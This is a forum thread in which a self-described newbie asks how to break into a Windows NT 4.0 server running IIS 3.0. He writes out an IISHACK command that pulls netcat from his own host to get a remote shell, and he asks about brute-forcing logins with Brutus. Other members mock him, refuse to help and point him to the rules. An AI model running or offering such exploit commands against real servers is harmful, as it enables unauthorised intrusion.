Thread: IIS 3.0 ON nt 4.0

IIS 3.0 ON nt 4.0

I am a newbie into this exciting and oil burning field.I am trying to use NC netcat in order to hack into an NT box running 4.0.

I am trying to learn as many exploits that come with hosting website on IIS 3.0 and 4.0

For instance is Brutus effective in trying force login and a password into a remote server running IIA 3.0 ?

Also how do i deploy IISHACK.exe in order to use NC.I have downloaded them and tried to run - iishack.exe www.mytarget.com 80 myserver/nc

but did not get c prompt from the remote machine.

I now need halp enough reading.
    @DOT.COM

ENNIS!

Another one to close, right over here, buddy!

The immortal question lives on... when will they learn? When will they read the rules?

SSJVegeta-Sei

Pierce me with steel, rend me with claw and fang; as I die, a legend is born for another generation to follow.
    An\' it harm none, do as ye will. - Wiccan Rede

Be advise that if you post questions like this on here you will likely have a great chance of being flamed and banned.

Like Vegeta suggested please feel free to read the F.A.Q.
    [ What's so hard about reading the F.A.Q. ? ]

Feel free to read the attachment below, hopefully this will change your views of what a hacker is and is not.

Side Note: But dont worry your not the only one who has done this before.
    Operation Cyberslam
    \"I\'ve noticed that everybody that is for abortion has already been born.\" Author Unknown
    Microsoft Shared Computer Toolkit
    Proyecto Ututo EarthCam

Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    LOL, do you *really* need a hacking tool to break into a box running IIS 3.0?????

If you do then perhaps an exciting career at the oil burning gas station would be more appropriate.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden